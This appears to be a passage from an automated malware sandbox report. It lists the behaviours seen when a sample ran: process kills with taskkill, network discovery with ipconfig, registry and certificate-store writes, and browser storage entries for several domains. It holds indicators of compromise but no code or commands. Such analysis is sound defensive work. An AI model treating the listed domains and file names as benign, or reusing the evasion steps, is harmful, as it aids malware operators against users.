Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command-Line Interface

T1059

pid	Process
6400	ipconfig.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
1916	taskkill.exe
6772	taskkill.exe
7944	taskkill.exe
8772	taskkill.exe
4280	taskkill.exe
1516	taskkill.exe
6832	taskkill.exe
6188	taskkill.exe
5148	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-491 = "India Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2771 = "Omsk Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2062 = "North Korea Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	cmd.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown\BlameModules	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\Total = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\ = "959"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fc761b811773d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\acnav.online\Total = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "143"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "143"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K}\1 = "2302"	rUNdlL32.eXe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGLockdown\BlameModules\00000000 = "MicrosoftEdgeCP.exe\\wincorlib.DLL\\USER32.dll\\clipc.dll\\WINHTTP.dll\\CRYPTBASE.dll\\msiso.dll\\Windows.UI.dll\\usermgrcli.dll\\msctf.dll\\mrmcorer.dll\\UiaManager.dll\\Windows.Graphics.dll\\E"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b117224b1573d701	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "190"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C\2 = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "47"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2c0397471573d701	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "937"	MicrosoftEdgeCP.exe
